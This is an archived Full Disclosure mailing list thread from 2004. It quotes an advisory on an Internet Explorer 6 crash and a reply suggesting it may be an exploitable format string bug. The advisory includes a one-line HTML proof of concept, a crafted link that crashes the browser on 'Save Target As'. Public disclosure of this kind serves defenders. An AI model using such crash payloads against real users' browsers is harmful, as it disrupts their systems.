Full Disclosure mailing list archives

Re: Internet Explorer Remote Null Pointer Crash(mshtml.dll)

From: "Berend-Jan Wever" <SkyLined () edup tudelft nl>
Date: Tue, 15 Jun 2004 03:33:45 +0200

Doesn't look like a null pointer to me, especially since it crashes while
reading 800c0005...
I think it's a format string vulnerability, causing ntdll.RtlFormatMessage
to call ntdll._snwprintf with your href. Might be exploitable, I'll have a
look...

Cheers,
SkyLined
----- Original Message ----- 
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
To: "vulnwatch" <vulnwatch () vulnwatch org>
Sent: Monday, June 14, 2004 23:20
Subject: [Full-disclosure] Internet Explorer Remote Null Pointer
Crash(mshtml.dll)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:      Internet Explorer
Vendors:           http://www.microsoft.com
Versions:          6.0.2800.1106.xpclnt_qfe.021108-2107
Patched With:  SP1;Q832894;Q330994;Q837009;Q831167;
ModName:       mshtml.dll
ModVer:           6.0.2734.1600
Platforms:        Windows
Bug:                  Remote/Local Null Pointer Crash
Exploitation:    Remote with browser
Date:                14 Jun 2004
Author:             Rafel Ivgi, The-Insider
e-mail:              the_insider () mail com
web:                 http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the
world.
It comes by default with every windows operating system. Therefore any
vulnerability
concerning it is an highly important issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Upon clicking "Save As" on a link with double colon --> "::"
and
a left curly bracket --> "{"
then
Internet Explorer Will Crash.

AppName: iexplore.exe  AppVer: 6.0.2600.0  ModName: ntdll.dll
ModVer: 5.1.2600.114  Offset: 00056074

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Paste into an htm/html file:
<center><a href=::%7b>Right  Click aOn Me And Click "Save Target As"</a>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Internet Explorer Remote Null Pointer Crash(mshtml.dll) Rafel Ivgi, The-Insider (Jun 14)
- Re: Internet Explorer Remote Null Pointer Crash(mshtml.dll) Berend-Jan Wever (Jun 14)
- <Possible follow-ups>
- RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll) Thor Larholm (Jun 15)
- RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll) http-equiv () excite com (Jun 15)